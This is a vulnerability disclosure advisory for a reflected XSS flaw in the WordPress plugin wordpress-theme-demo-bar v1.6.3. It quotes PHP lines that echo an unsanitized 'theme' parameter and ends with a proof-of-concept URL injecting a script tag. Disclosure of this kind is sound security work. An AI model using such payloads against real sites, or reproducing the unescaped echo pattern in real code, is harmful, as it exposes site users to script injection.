Advisory #: 88
Title: Reflected XSS in wordpress plugin wordpress-theme-demo-bar v1.6.3
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/wordpress-theme-demo-bar
Downloads: 33467
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: wordpress-theme-demo-bar
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./wordpress-theme-demo-bar/edit-theme-options.php: 43:<a class="wptdb_qtip" title="Refresh this page back to <?php echo $editingtheme['Name']; ?> theme options." href="<?php echo $zv_wptdb_siteurl; ?>/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme=<?php echo $_GET['theme']; ?>">Refresh</a> 45:<a target="_blank" class="wptdb_qtip" title="Preview this theme in a new window after you save the theme options." href="<?php echo $zv_wptdb_siteurl; ?>/?themedemo=<?php echo $_GET['theme']; ?>">Preview</a> 56:document.getElementById('iframe_container').innerHTML = '<iframe id="option-iframe" width="600" height="400" src="<?php echo $zv_wptdb_siteurl; ?>/wp-admin/themes.php?page=functions.php&themedemo=<?php echo $_GET['theme']; ?>&editfunctionsphp=1" style="margin:0px;padding:0px;border:5px solid #cccccc"></iframe>'; The variable theme appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./wordpress-theme-demo-bar/edit-theme-options.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/wordpress-theme-demo-bar/edit-theme-options.php?theme="><script>alert(1);</script><"